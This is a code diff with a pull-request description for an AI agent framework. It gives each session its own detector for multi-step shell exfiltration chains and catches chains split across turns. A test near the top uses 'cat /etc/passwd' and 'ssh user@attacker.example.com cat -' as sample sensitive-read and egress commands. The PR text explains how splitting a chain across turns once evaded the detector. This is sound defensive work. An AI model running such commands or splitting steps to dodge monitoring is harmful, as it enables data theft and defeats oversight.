+    /// a `SensitiveRead` call through session A only, then confirms session B's very first
+    /// call — a lone `NetworkEgress` command — is NOT blocked. Before #6588, one
+    /// `RiskChainAccumulator` shared across every `/sessions*` agent would have let A's read
+    /// bleed into B's accumulator and cause exactly this false-positive block.
+    #[tokio::test]
+    async fn serve_session_risk_chain_state_does_not_leak_across_sessions() {
+        let (session_a, _queue_a) = build_serve_session_shell_composite(vec!["/".to_owned()]);
+        let (session_b, queue_b) = build_serve_session_shell_composite(vec!["/".to_owned()]);
+
+        let a_read = session_a
+            .execute_tool_call_erased(&make_bash_call("cat /etc/passwd"))
+            .await;
+        assert!(
+            a_read.is_ok(),
+            "session A's sensitive read must not be blocked, got {a_read:?}"
+        );
+
+        let b_egress = session_b
+            .execute_tool_call_erased(&make_bash_call("ssh user@attacker.example.com cat -"))
+            .await;
+        assert!(
+            b_egress.is_ok(),
+            "session B's lone network-egress call must NOT be blocked by session A's prior \
+             sensitive read — a block here would mean the two sessions share \
+             RiskChainAccumulator state, got {b_egress:?}"
+        );
+        assert!(
+            queue_b.lock().is_empty(),
+            "session B's signal queue must stay empty — no chain should have fired for it"
         );
     }
 

--- a/src/serve/deps.rs
+++ b/src/serve/deps.rs
@@ -95,12 +95,19 @@ pub(crate) struct ServeAgentDeps {
     pub(crate) rl_persist_interval: u32,
     pub(crate) rl_warmup_updates: u32,
     pub(crate) rl_head: Option<zeph_skills::rl_head::RoutingHead>,
-    /// Base tool composite (file/shell/scrape/cwd), *not* wrapped in any gate. Per SEC-H1
-    /// (concurrent `/sessions` share this one `Arc`, but `TrustGateExecutor`/`PolicyGateExecutor`
-    /// carry per-turn *mutable* trust state), `agent_factory::build_agent_factory` wraps a
-    /// fresh trust/policy/adversarial gate stack around this shared base **per session** — see
-    /// its doc comment. This field must never be dispatched to directly without that wrap.
+    /// Base tool composite (file/scrape/cwd), *not* wrapped in any gate. Deliberately excludes
+    /// `shell` (#6588) — `agent_factory::build_agent_factory` composes a fresh per-session
+    /// `ShellExecutor` (from `shell_ingredients` below) as an outer layer around this shared
+    /// chain, so each session gets its own `RiskChainAccumulator`. Per SEC-H1 (concurrent
+    /// `/sessions` share this one `Arc`, but `TrustGateExecutor`/`PolicyGateExecutor` carry
+    /// per-turn *mutable* trust state), `agent_factory::build_agent_factory` also wraps a fresh
+    /// trust/policy/adversarial gate stack around the combined per-session tree — see its doc
+    /// comment. This field must never be dispatched to directly without that wrap.
     pub(crate) tool_executor: Arc<dyn ErasedToolExecutor>,
+    /// Ingredients for rebuilding a fresh `ShellExecutor` per session (#6588) — see
+    /// [`ShellSessionIngredients`]'s doc comment for why `ShellExecutor` is excluded from
+    /// `tool_executor` above and cannot be shared the way the rest of the base chain is.
+    pub(crate) shell_ingredients: ShellSessionIngredients,
     /// `[security.capability_scopes]` snapshot (#6045). `assemble_serve_deps` only *validates*
     /// this compiles against the tool registry at startup (fatal on error, matching
     /// `runner.rs`/`daemon.rs`'s precedent for this process-global config) — the actual
@@ -205,13 +212,6 @@ pub(crate) struct ServeAgentDeps {
     /// `Agent::with_tools_enabled` so `[tools] enabled = false` actually suppresses tool
     /// definitions for `/sessions`-built agents, matching `runner.rs`/`daemon.rs`/`acp.rs`.
     pub(crate) tools_enabled: bool,
-    /// Shared multi-step shell attack-chain detector, attached to the shared `ShellExecutor`
-    /// inside `tool_executor` via `agent_setup::wire_risk_chain`. `agent_factory` passes the
-    /// same `Arc` into every session's `Agent::with_risk_chain_accumulator` via
-    /// `agent_setup::apply_entrypoint_security_controls` (#6578) — mirrors `src/runner.rs`,
-    /// `src/daemon.rs`, and `src/acp.rs`. See `agent_setup::wire_risk_chain`'s doc comment for
-    /// the cross-session sharing caveat under concurrent `/sessions*` load.
-    pub(crate) risk_chain_accumulator: Arc<zeph_tools::RiskChainAccumulator>,
     /// Typed-page CAM fidelity state (#6574), built once at startup via
     /// `agent_setup::build_typed_pages_state` since `[memory.compression.typed_pages]` is static
     /// config. `agent_factory` clones the `Arc` into every session via
@@ -290,7 +290,7 @@ pub(crate) async fn assemble_serve_deps(
              this serve-sessions process (serve wires no hooks or MCP tools yet)"
         );
     }
-    let (tool_executor, permission_policy, audit_logger, risk_chain_accumulator) =
+    let (tool_executor, permission_policy, audit_logger, shell_ingredients) =
         build_tool_executor(config, supervisor).await?;
     // #6574: typed-page CAM fidelity enforcement, matching src/runner.rs/src/daemon.rs/
     // src/acp.rs — previously only the CLI/TUI path built `TypedPagesState`, so `/sessions`-
@@ -356,12 +356,26 @@ pub(crate) async fn assemble_serve_deps(
     // this validation and `build_agent_factory`'s real per-session tree call, so the two
     // registries can never drift apart. `conversation_id`/`memory_validation_config` only
     // affect runtime dispatch, not `tool_definitions()` — safe to use placeholder values here.
+    //
+    // #6588: `tool_executor` no longer includes `shell` (rebuilt fresh per session — see
+    // `ShellSessionIngredients`'s doc comment), so a throwaway `ShellExecutor` (no risk chain;
+    // discarded immediately, only its `tool_definitions()` are read) is composed in here too —
+    // otherwise a scope pattern referencing `builtin:bash` would hit the exact #6045/F1
+    // `DeadPattern` regression this validation exists to prevent, since the real per-session
+    // registry (built by `build_agent_factory` with the fresh per-session shell layer) DOES
+    // contain it.
     let capability_scopes_config = config.security.capability_scopes.clone();
     if !capability_scopes_config.scopes.is_empty() {
         use zeph_tools::scope::build_scoped_executor;
+        let validation_shell = zeph_tools::ShellExecutor::new(&shell_ingredients.config);
+        let tool_executor_for_validation: Arc<dyn ErasedToolExecutor> =
+            Arc::new(zeph_tools::CompositeExecutor::new(
+                validation_shell,
+                zeph_tools::DynExecutor(Arc::clone(&tool_executor)),
+            ));
         let (composed_for_validation, _trust_snapshot) =
             crate::serve::agent_factory::compose_session_tool_tree(
-                Arc::clone(&tool_executor),
+                tool_executor_for_validation,
                 &core.registry,
                 &core.memory,
                 zeph_memory::ConversationId(0),
@@ -581,6 +595,7 @@ pub(crate) async fn assemble_serve_deps(
         rl_warmup_updates: config.skills.rl_warmup_updates,
         rl_head: core.rl_head.clone(),
         tool_executor,
+        shell_ingredients,
         capability_scopes_config,
         permission_policy,
         audit_logger,
@@ -621,7 +636,6 @@ pub(crate) async fn assemble_serve_deps(
             .map(PathBuf::from)
             .collect(),
         tools_enabled: config.tools.enabled,
-        risk_chain_accumulator,
         typed_pages_state,
         shadow_memory_config: config.memory.shadow_memory.clone(),
     })
@@ -645,6 +659,37 @@ pub(crate) async fn resolve_auth_token(app: &crate::bootstrap::AppBuilder) -> Op
         );
         None
     })
+}
+
+/// Ingredients needed to rebuild a fresh `ShellExecutor` per session (#6588).
+///
+/// Unlike file/scrape/cwd (safe to share connection/server-wide), `ShellExecutor` must not be
+/// shared across concurrent `/sessions*` agents — each needs its own `RiskChainAccumulator` so
+/// one session's turn-reset cannot wipe another's mid-chain state. Sandbox initialization is
+/// real work and safe to share (the resulting `Arc`/`SandboxPolicy` are cheap to clone into
+/// each session's executor), so it is built once and stored here rather than redone per
+/// session.
+#[derive(Clone)]
+pub(crate) struct ShellSessionIngredients {
+    pub(crate) config: zeph_config::tools::ShellConfig,
+    pub(crate) filters_config: zeph_config::tools::FilterConfig,
+    pub(crate) sandbox: Option<(Arc<dyn zeph_tools::Sandbox>, zeph_tools::SandboxPolicy)>,
+    pub(crate) task_supervisor: zeph_common::task_supervisor::TaskSupervisor,
+}
+
+impl Default for ShellSessionIngredients {
+    /// Test/fixture default: no sandbox, a fresh standalone supervisor. Production always
+    /// builds this via [`build_tool_executor`], never via `Default`.
+    fn default() -> Self {
+        Self {
+            config: zeph_config::tools::ShellConfig::default(),
+            filters_config: zeph_config::tools::FilterConfig::default(),
+            sandbox: None,
+            task_supervisor: zeph_common::task_supervisor::TaskSupervisor::new(
+                tokio_util::sync::CancellationToken::new(),
+            ),
+        }
+    }
 }
 
 /// Builds the core shell/file/web/cwd tool set (sandbox + audit wired the same way
@@ -671,19 +716,13 @@ async fn build_tool_executor(
     Arc<dyn ErasedToolExecutor>,
     zeph_tools::PermissionPolicy,
     Option<Arc<zeph_tools::AuditLogger>>,
-    Arc<zeph_tools::RiskChainAccumulator>,
+    ShellSessionIngredients,
 )> {
     let permission_policy =
         zeph_tools::build_permission_policy(&config.tools, config.security.autonomy_level);
-    let filter_registry = if config.tools.filters.enabled {
-        zeph_tools::OutputFilterRegistry::default_filters(&config.tools.filters)
-    } else {
-        zeph_tools::OutputFilterRegistry::new(false)
-    };
-    let mut shell_executor = zeph_tools::ShellExecutor::new(&config.tools.shell)
-        .with_permissions(permission_policy.clone())
-        .with_output_filters(filter_registry)
-        .with_task_supervisor(supervisor.clone());
+    // #6588: `ShellExecutor` itself is NOT built here — see `ShellSessionIngredients`'s doc
+    // comment. Only the expensive, connection-scoped sandbox backend is built once here.
+    let mut shell_sandbox: Option<(Arc<dyn zeph_tools::Sandbox>, zeph_tools::SandboxPolicy)> = None;
     if config.tools.sandbox.enabled {
         let denied_present = !config.tools.sandbox.denied_domains.is_empty();
         match zeph_tools::sandbox::build_sandbox_with_policy(
@@ -694,7 +733,7 @@ async fn build_tool_executor(
             Ok(backend) => {
                 let name = backend.name();
                 let policy = crate::agent_setup::sandbox_policy_from_config(&config.tools.sandbox);
-                shell_executor = shell_executor.with_sandbox(Arc::from(backend), policy);
+                shell_sandbox = Some((Arc::from(backend), policy));
                 tracing::info!(backend = name, "OS sandbox enabled (serve-sessions)");
             }
             Err(e) if config.tools.sandbox.strict || config.tools.sandbox.fail_if_unavailable => {
@@ -723,19 +762,12 @@ async fn build_tool_executor(
         && let Ok(logger) = zeph_tools::AuditLogger::from_config(&config.tools.audit, false).await
     {
         let logger = Arc::new(logger);
-        shell_executor = shell_executor.with_audit(Arc::clone(&logger));
         scrape_executor = scrape_executor.with_audit(Arc::clone(&logger));
         if let Some(w) = web_search_executor.take() {
             web_search_executor = Some(w.with_audit(Arc::clone(&logger)));
         }
         audit_logger = Some(logger);
     }
-    // #6578: wire the multi-step shell attack-chain detector, matching src/runner.rs's
-    // `agent_setup::build_tool_setup` — previously only the CLI/TUI path constructed a
-    // `RiskChainAccumulator`, so `/sessions`-built agents' `ShellExecutor` silently skipped the
-    // `SensitiveRead` -> `NetworkEgress` chain check entirely.
-    let (shell_executor, risk_chain_accumulator) =
-        crate::agent_setup::wire_risk_chain(shell_executor);
     let file_executor = zeph_tools::FileExecutor::new(
         config
             .tools
@@ -754,22 +786,23 @@ async fn build_tool_executor(
             .map(PathBuf::from)
             .collect(),
     );
+    // #6588: `shell` is deliberately excluded from this shared chain — the per-session factory
+    // (`agent_factory::build_agent_factory`) composes a fresh `ShellExecutor` as an outer layer
+    // instead, using `ShellSessionIngredients` below.
     let base: Arc<dyn ErasedToolExecutor> = Arc::new(zeph_tools::CompositeExecutor::new(
         file_executor,
         zeph_tools::CompositeExecutor::new(
-            shell_executor,
-            zeph_tools::CompositeExecutor::new(
-                scrape_executor,
-                crate::agent_setup::with_search_executor(cwd_executor, web_search_executor),
-            ),
+            scrape_executor,
+            crate::agent_setup::with_search_executor(cwd_executor, web_search_executor),
         ),
     ));
-    Ok((
-        base,
-        permission_policy,
-        audit_logger,
-        risk_chain_accumulator,
-    ))
+    let shell_ingredients = ShellSessionIngredients {
+        config: config.tools.shell.clone(),
+        filters_config: config.tools.filters.clone(),
+        sandbox: shell_sandbox,
+        task_supervisor: supervisor.clone(),
+    };
+    Ok((base, permission_policy, audit_logger, shell_ingredients))
 }
 
 #[cfg(test)]

--- a/src/serve/handlers.rs
+++ b/src/serve/handlers.rs
@@ -582,6 +582,7 @@ mod tests {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -621,7 +622,6 @@ mod tests {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };

--- a/src/serve/test_support.rs
+++ b/src/serve/test_support.rs
@@ -128,6 +128,7 @@ impl ServeTestHarness {
             rl_warmup_updates: 0,
             rl_head: None,
             tool_executor: Arc::new(zeph_tools::SetCwdExecutor::new(vec![])),
+            shell_ingredients: crate::serve::deps::ShellSessionIngredients::default(),
             capability_scopes_config: zeph_config::CapabilityScopesConfig::default(),
             permission_policy: zeph_tools::PermissionPolicy::default(),
             audit_logger: None,
@@ -167,7 +168,6 @@ impl ServeTestHarness {
             secret_registry: None,
             vigil_config: zeph_config::VigilConfig::default(),
             feedback_classifier: None,
-            risk_chain_accumulator: Arc::new(zeph_tools::RiskChainAccumulator::new(None)),
             typed_pages_state: None,
             shadow_memory_config: zeph_config::TrajectoryRiskAccumulatorConfig::default(),
         };


### PR DESCRIPTION
## Summary

`RiskChainAccumulator` (`crates/zeph-tools/src/risk_chain.rs`) is the shell executor's multi-step exfiltration-chain detector — it blocks a command when it observes an ordered pattern like a sensitive-file read followed by network egress. This PR closes three related gaps in that control, all surfacing after PR #6587's entry-point wiring landed:

- **#6561** — the accumulator was fully cleared at every turn boundary, so a chain deliberately split across turns (read in turn N, exfiltrate in turn N+1) went completely undetected, despite the module doc claiming a cross-turn fallback existed. `reset()` is replaced by `advance_turn()`, which prunes only calls older than a bounded 3-turn window and recomputes the cumulative score from what remains, so a split chain within the window is still caught. A dedup marker prevents one live chain from re-pushing its signal on every subsequent call while still matched, which would otherwise let a single detection flood `TrajectorySentinel` into a false session-wide block. Signal codes for the two chain patterns are now also explicitly mapped in `RiskSignal::from_code` at an appropriate weight — previously they fell through to the lowest fallback tier, making a confirmed chain-fire near-invisible to `TrajectorySentinel`/MAGE.
- **#6588** — ACP and serve built one `RiskChainAccumulator` per connection/server and shared it via `Arc` across every concurrent session, so one session's turn reset could wipe another session's chain state, or unrelated sessions' activity could combine into a spurious block. Each session now gets its own `ShellExecutor`/`RiskChainAccumulator` built at session-construction time, composed over the shared connection/server base (sandbox, audit logger, permission policy).
- **#6589** — added end-to-end tests per entry point (runner, daemon, acp, serve) dispatching a real chained tool-call sequence through each entry point's production executor construction path and asserting the block, plus dedicated regression tests for the cross-turn split and session isolation.

A follow-up P3 issue will be filed separately for making the 3-turn cross-turn window configurable (currently a documented, bounded constant) rather than blocking this PR on it.

## Test plan

- [x] `cargo +nightly fmt --check`
- [x] `cargo clippy --profile ci --workspace --all-targets --features "desktop,ide,server,chat,pdf,scheduler,testing" -- -D warnings`
- [x] `cargo nextest run --config-file .github/nextest.toml --workspace --features "desktop,ide,server,chat,pdf,scheduler" --lib --bins` — 14962 passed, 0 failed, 36 skipped
- [x] rustdoc gate (`RUSTFLAGS="-D warnings" RUSTDOCFLAGS="--deny rustdoc::broken_intra_doc_links"`)
- [x] `cargo test --doc` for touched crates
- [x] `gitleaks protect --staged`
- [x] New unit tests: cross-turn split detection, window aging-out, signal dedup, signal-weight mapping
- [x] New e2e tests per entry point (runner/daemon/acp/serve) through real production executor construction
- [x] `.local/testing/playbooks/risk-chain-accumulator.md` and `.local/testing/coverage-status.md` updated
- [ ] Live multi-session testing (two concurrent ACP/serve sessions via a real client) — not yet performed, flagged `Untested` in coverage-status.md pending a live-tester CI cycle